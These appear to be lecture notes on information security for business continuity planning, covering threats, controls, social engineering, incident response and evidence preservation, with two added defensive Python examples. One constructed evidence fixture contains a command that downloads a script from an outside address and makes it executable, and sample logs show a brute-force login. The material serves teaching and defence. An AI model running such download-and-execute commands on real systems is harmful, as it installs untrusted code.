Business Continuity Planning & Disaster Recovery Planning 13
A simulated disaster and comprehensive recovery test may involve many of an organization’s key personnel for several days: is this a reasonable burden to place on a busy, competitive company? How would you argue against the inevitable tendency to shortcut the procedure?
350-400 words.
Chapter 19: Information Security Response
Security plans
Physical security
Logical security
Encryption
Proper disposal of assets
Policies and training to guide employees
What to protect
Information security protects three aspects of data systems – CIA
Confidentiality – only authorized access is permitted
Integrity – protect against unauthorized alteration
Availability – data systems and data are available
Ways to improve Availability: UPS, RAID, clustering of critical servers, failover capability
Information security risks
Threats
Vulnerabilities
Controls
Threats
Malicious hackers
Bored students
Unhappy employees
Helpful employees
Thieves
Lazy engineers
Hardware failure
Vulnerabilities
A weakness that a threat exploits to attack your company
A gap in the protection methods
Scan regularly for vulnerabilities
Controls
Preventive actions taken to stop an attack
Warning sensors
Technical solutions
Administrative actions to reduce vulnerabilities
Physical security
Fence around company’s buildings
Locked doors
Locked door on data center
Technical security
User IDs and passwords
Access control list (ACL)
Controls on routers and wireless access points
Change default passwords
Lock down equipment
Data security
Types of Data:
Personally identifiable information (PII)
Student records
Medical records
Credit card or check numbers
Data security – cont’d
Protect Data:
Encrypt all portable data
Incoming and outgoing data must be encrypted using a company-approved standard
Disable USB ports
All retired storage devices must be physically destroyed before disposal
Company documents shredded
Implement a clean desk policy
Screen-saver timeout with a password-protected lock
Social engineering
Phone call from someone claiming to be Help Desk asking for ID information
Official-looking person claiming to be repairman
Hacker who searches social media for IT staff at a target company
Person walking behind an employee towards a security door
Caller pretending to be vendor
Person quietly watching over someone’s shoulder
Dumpster diver
Incident management
Details the initial action steps necessary to:
Stop the intrusion
Contain the damage
Gather evidence as to the source
Objectives
Actual impact
Plan contents
Confirm the incident is not a false positive
Activate the response team
Open the telephone bridge
Assess the situation
Incident management team checks rest of IT systems for potential break-ins
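The first and last steps above (confirm the alert is not a false positive; check the rest of the IT systems for the same attacker) are the ones a practitioner most wants to see in working form. The block below is an added example, not code from the slides or from any vendor product. It assumes sshd-style auth log lines in the constructed format "timestamp host sshd[pid]: message" (the sample lines, hostnames and IP addresses are constructed for the example); it confirms an incident only when one source produces a burst of failed logins on a host and is then accepted there, and then pivots to see which other hosts that source touched.

```python
"""Triage helper for the incident-management plan steps above.

Added example; the log lines, hostnames and addresses are constructed,
not from any real system. Format assumption: "<ISO ts> <host> sshd[pid]: <msg>".
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample: three hosts, one brute-force that succeeds on web01,
# one isolated failed login on web02 that is just a user typo.
SAMPLE_LOG = """\
2024-03-01T08:00:01 web01 sshd[101]: Failed password for root from 203.0.113.5 port 4410 ssh2
2024-03-01T08:00:03 web01 sshd[102]: Failed password for root from 203.0.113.5 port 4411 ssh2
2024-03-01T08:00:05 web01 sshd[103]: Failed password for admin from 203.0.113.5 port 4412 ssh2
2024-03-01T08:00:07 web01 sshd[104]: Failed password for admin from 203.0.113.5 port 4413 ssh2
2024-03-01T08:00:09 web01 sshd[105]: Failed password for oracle from 203.0.113.5 port 4414 ssh2
2024-03-01T08:00:11 web01 sshd[106]: Accepted password for oracle from 203.0.113.5 port 4415 ssh2
2024-03-01T08:02:30 db01 sshd[201]: Failed password for oracle from 203.0.113.5 port 5100 ssh2
2024-03-01T08:15:00 web02 sshd[301]: Failed password for alice from 198.51.100.7 port 6001 ssh2
2024-03-01T08:15:20 web02 sshd[302]: Accepted password for alice from 198.51.100.7 port 6002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\S+) (?P<host>\S+) sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) password for (?P<user>\S+) from (?P<src>\S+)"
)


def parse(log_text):
    """Turn matching log lines into event dicts; unrelated lines are skipped."""
    events = []
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if m:
            events.append({
                "ts": datetime.fromisoformat(m["ts"]),
                "host": m["host"], "result": m["result"],
                "user": m["user"], "src": m["src"],
            })
    return events


def confirm_incident(events, threshold=5, window=timedelta(minutes=5)):
    """Plan step 1 (rule out false positives): a (source, host) pair is
    confirmed only if at least `threshold` failures land within `window`
    before an accepted login from the same source on the same host.
    Returns a list of (src, host, accepted_user)."""
    confirmed = []
    by_key = defaultdict(list)
    for e in events:
        by_key[(e["src"], e["host"])].append(e)
    for (src, host), evs in by_key.items():
        evs.sort(key=lambda e: e["ts"])
        failures = [e for e in evs if e["result"] == "Failed"]
        for acc in (e for e in evs if e["result"] == "Accepted"):
            recent = [f for f in failures if acc["ts"] - window <= f["ts"] <= acc["ts"]]
            if len(recent) >= threshold:
                confirmed.append((src, host, acc["user"]))
                break
    return confirmed


def pivot_check(events, src, exclude_host):
    """Plan step 5: which other hosts has the same source touched?"""
    return sorted({e["host"] for e in events if e["src"] == src and e["host"] != exclude_host})


def triage(log_text):
    """Confirmed incidents, each with the list of other hosts to inspect."""
    events = parse(log_text)
    return [
        {"src": src, "host": host, "user": user,
         "other_hosts": pivot_check(events, src, host)}
        for src, host, user in confirm_incident(events)
    ]


if __name__ == "__main__":
    for item in triage(SAMPLE_LOG):
        print(item)
```

Run as-is it reports one confirmed incident on web01 and flags db01 for inspection; the single failure on web02 followed by a success is left alone, which is the false-positive case the plan tells the team to rule out before opening the bridge. Threshold and window are assumptions to tune per environment.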
Incident after-action review
Conduct a review within a few days of incident
Format for review questions:
What happened?
What should have happened?
What went well?
What did not go well?
What will be done differently next time?
Testing the response plan
Test the plan with the team regularly
Testing updates to the procedures
Testing for new team members
Testing may help to identify false positives
Preserving forensic evidence
Types of evidence to collect:
Photographs
Clock offset of each device relative to a trusted reference time
Cryptographic hash of every data set collected
System log files
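The evidence list above is only useful if the hashes and clock offsets are recorded in a way that can later prove the data set is unchanged. The block below is an added example, not code from the slides: it records the collection device's clock offset against a trusted reference, hashes every collected file with SHA-256 into a manifest, and re-verifies the manifest to detect later modification. The files, timestamps and collector name are constructed for the example.

```python
"""Evidence-preservation helper for the list above.

Added example; the "evidence" files, timestamps and collector name are
constructed, not taken from any real incident.
"""
import hashlib
import json
import os
import tempfile
from datetime import datetime, timezone

# Constructed evidence files written to a temp dir by run_demo().
CONSTRUCTED_FILES = {
    "auth.log": b"2024-03-01T08:00:11 web01 sshd[106]: Accepted password for oracle from 203.0.113.5\n",
    "bash_history": b"wget http://203.0.113.5/x.sh\nchmod +x x.sh\n",
}


def clock_offset_seconds(device_time, reference_time):
    """Offset of the device clock against a trusted reference (for example the
    responder's NTP-synced laptop). Positive means the device runs ahead;
    this is what lets log timestamps from different devices be lined up."""
    return (device_time - reference_time).total_seconds()


def sha256_bytes(data):
    return hashlib.sha256(data).hexdigest()


def sha256_file(path):
    """Stream the file so large images can be hashed without loading them."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def build_manifest(paths, device_time, reference_time, collector):
    """One manifest per device: who collected, when (reference clock), the
    device's clock offset, and a hash plus size for every data set."""
    return {
        "collected_at_reference_utc": reference_time.isoformat(),
        "device_clock_offset_seconds": clock_offset_seconds(device_time, reference_time),
        "collector": collector,
        "items": [{"path": p, "size": os.path.getsize(p), "sha256": sha256_file(p)}
                  for p in paths],
    }


def verify_manifest(manifest):
    """Re-hash every item; returns the paths whose contents no longer match."""
    return [i["path"] for i in manifest["items"] if sha256_file(i["path"]) != i["sha256"]]


def write_constructed_evidence(directory):
    paths = []
    for name, content in CONSTRUCTED_FILES.items():
        p = os.path.join(directory, name)
        with open(p, "wb") as f:
            f.write(content)
        paths.append(p)
    return paths


def run_demo():
    """Collect, verify, then simulate tampering and verify again."""
    d = tempfile.mkdtemp(prefix="evidence_")
    paths = write_constructed_evidence(d)
    device_time = datetime(2024, 3, 1, 8, 0, 0, tzinfo=timezone.utc)       # what the device said
    reference_time = datetime(2024, 3, 1, 7, 58, 30, tzinfo=timezone.utc)  # trusted reference
    manifest = build_manifest(paths, device_time, reference_time, collector="responder-1")
    before = verify_manifest(manifest)        # expected: nothing changed
    with open(paths[0], "ab") as f:           # someone edits auth.log after collection
        f.write(b"tampered\n")
    after = verify_manifest(manifest)         # expected: auth.log flagged
    return manifest, before, after


if __name__ == "__main__":
    manifest, before, after = run_demo()
    print(json.dumps(manifest, indent=2))
    print("mismatches before tampering:", before)
    print("mismatches after tampering:", after)
```

The manifest itself must be protected the same way the evidence is: hash it, write that hash into the handwritten notes or a write-once medium, and keep the manifest separate from the evidence copy that analysts work on. Hashing a live file is only meaningful once the file has been copied off the compromised device; hash the copy you will keep.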
Establishing policies
Typical policies include:
Incident response
Acceptable use
Acceptable use policy should address:
Social engineering
Password management
User ID
Data policy
Patching policy
Educating employees
Employees are the number-one security threat
Essential that all employees are trained
Users should understand the importance of proper data disposal
Ongoing user awareness program
Verify training through exams
Summary
Information security is an important part of the BCP
Information security requires constant vigilance to prevent criminal activity
Incident response planning must be completed before it is needed